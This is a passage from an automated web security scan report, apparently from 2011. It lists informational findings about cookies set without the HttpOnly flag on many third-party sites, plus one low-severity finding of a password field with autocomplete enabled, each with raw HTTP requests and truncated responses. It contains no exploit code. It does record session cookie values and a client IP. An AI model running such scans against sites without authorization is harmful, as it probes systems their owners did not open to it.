<meta http-equiv="C
...[SNIP]...

18.514. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...

18.515. http://www.privacyguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privacyguard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.privacyguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23981
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=p1gb0ejpvt4afn45w4s11q55; path=/; HttpOnly
Set-Cookie: hasCookies=true; path=/
Set-Cookie: Visitor=67bf199058fc4cff85e2455d2b6e4342; expires=Tue, 24-Apr-2012 19:51:14 GMT; path=/
Date: Sun, 24 Apr 2011 19:51:13 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 7:51:14 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...

18.516. http://www.reputationengineer.com/wp-content/plugins/cforms/cforms-captcha.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /wp-content/plugins/cforms/cforms-captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/cforms/cforms-captcha.php?ts=&c1=4&c2=5&ac=abcdefghijkmnpqrstuvwxyz23456789&i=i&w=115&h=25&c=000066&l=000066&f=font4.ttf&a1=-12&a2=12&f1=17&f2=19&b=1.gif HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
Referer: http://www.reputationengineer.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42aa81e376903eb93de66220fdda0695; __utmz=62854959.1303691656.1.1.utmgclid=CN-bzOa1tqgCFYbb4AodHHmKBw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=62854959.1840992496.1303691656.1303691656.1303691656.1; __utmc=62854959; __utmb=62854959.3.10.1303691656

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:22 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Set-Cookie: turing_string_=i%2B1c1becbc4d6341b32de30f22bea00581; expires=Mon, 25-Apr-2011 06:30:22 GMT; path=/
Content-Type: image/png
Content-Length: 755

.PNG
.
...IHDR...s.........5......EPLTE.....f..............f.........__....13........??......y{....ubg.IM...jW...iIDATH..V... ..yi...#...S..0v4..f,..J.U.|}......[x-..]..%g...d...s.......s..b..`..
...[SNIP]...

18.517. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=160x600&pos=external
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2031-15587-1426029262-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 720
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 720

document.write('<a target=_blank href=\"http://www.revresda.com/event.ng/Type=click&FlightID=124851&AdID=246018&TargetID=56815&Segments=&Targets=&Values=60,75,80,90,101,152,194,216,32520,32876,32995,3
...[SNIP]...

18.518. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revresda.com
Path:   /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba024-26908-1353408694-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 195
Content-Type: application/x-javascript
Cache-Control: private
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/
Content-Length: 195

document.write('');
var ACE_AR = {site: '801362', size: '728090',exchmap: '0'};
document.write('<script type=\'text/javascript\' SRC=\'http://uac.advertising.com/wrapper/aceUAC.js\'><\/script>');

18.519. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

18.520. http://www.securepaynet.net/external/json/SalesBanner.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /external/json/SalesBanner.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/json/SalesBanner.aspx?layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496 HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; __utmb=1.1.10.1303648053; SiteWidth471557=1000; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:20 GMT
Content-Length: 124

jsonp1303648053058({"Html":"\r\n \r\n","TargetDivID":"ctl00_sidebarController_SidebarBanner_pnlSalesBanner","Data":null})

18.521. https://www.senderscore.org/landing/ppcregistration/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:54 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:30:54 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ff42t7omks9m225jgdh0f4huh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...

18.522. http://www.swisscom.ch/FxRes/asp/sitecatalyst/s_code_bw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /FxRes/asp/sitecatalyst/s_code_bw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FxRes/asp/sitecatalyst/s_code_bw.js HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:47 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: Apache=173.193.214.243.167121303670987960; path=/
Content-Length: 37996
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Jan 2009 14:15:36 GMT
Accept-Ranges: bytes
ETag: "3c6f3566407ac91:18ffa9"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

/* SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

18.523. https://www.trustedid.com/cmalp1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /cmalp1.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cmalp1.php?promoRefCode=SEMGOOGCM14DF&gclid=CLTp5ZX1tagCFUSo4Aod61iHCA HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: promoRefCode=NXTIDF01IDEFT

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:23:36 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303676616385263; path=/; domain=.trustedid.com
Set-Cookie: TSI=n9aijp6kmv2idr7asjh3a48343; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 20:23:35 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=tsis0amhjkv950im9ira5ikvg6; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=SEMGOOGCM14DF; expires=Tue, 24-May-2011 20:23:36 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 20:23:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 20733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>TrustedID - America's Identity Theft Protection Company - Identity Theft P
...[SNIP]...

18.524. https://www.trustedid.com/idfide01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /idfide01/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:34 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614754152763; path=/; domain=.trustedid.com
Set-Cookie: TSI=6rjj85kupb6n5r77pnlgtoq3g0; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10457

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Best-in-class Identity Protection</title>
<meta content="text/ht
...[SNIP]...

18.525. https://www.trustedid.com/registration.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /registration.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:50:27 GMT
Server: Apache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:50:26 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: TSI=rad7gd7ho7s7nspvlonpj701d5; path=/; domain=www.trustedid.com; secure; HttpOnly
Set-Cookie: promoRefCode=NXTIDF01IDEFT; expires=Tue, 24-May-2011 03:50:27 GMT; path=/; domain=.trustedid.com; secure
Last-Modified: Sun, 24 Apr 2011 03:50:27 GMT
Cache-Control: post-check=0, pre-check=0
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 26670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>

<title>Identity Theft Protection Enrollment - TrustedID Registration</title>
<met
...[SNIP]...

18.526. https://www.trustedid.com/suzeidprotector/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /suzeidprotector/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1
Host: www.trustedid.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:12:19 GMT
Server: Apache
Set-Cookie: TIDT=173.193.214.243.1303614739643665; path=/; domain=.trustedid.com
Set-Cookie: TSI=lsgdamrpaddiv88ogrb60v3bq3; path=/; domain=www.trustedid.com; secure; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: promoRefCode=NXDIRSUZIDPANN; expires=Tue, 24-May-2011 03:12:19 GMT; path=/; domain=.trustedid.com; secure
Set-Cookie: refCode=deleted; expires=Sat, 24-Apr-2010 03:12:18 GMT; path=/; domain=.trustedid.com; secure
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 12420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Identity Theft Protection from Suze Orman</title>
<meta content=
...[SNIP]...

19. Password field with autocomplete enabled  previous  next
There are 43 instances of this issue:


19.1. https://arcsight.secure.force.com/sitelogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://arcsight.secure.force.com
Path:   /sitelogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitelogin HTTP/1.1
Host: arcsight.secure.force.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Pragma: no-cache
Expires: Sun, 24 Apr 2011 20:42:08 GMT
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2011 20:42:08 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><head><script src="/jslibrary/1296001444000/JiffyStubs.js" type="text/javascript"></scri
...[SNIP]...
<span id="loginPage:SiteTemplate:siteLogin">
<form id="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm" name="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm" method="post" action="https://arcsight.secure.force.com/sitelogin?refURL=http%3A%2F%2Farcsight.secure.force.com%2Fsitelogin" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm" value="loginPage:SiteTemplate:siteLogin:loginComponent:loginForm" />
...[SNIP]...
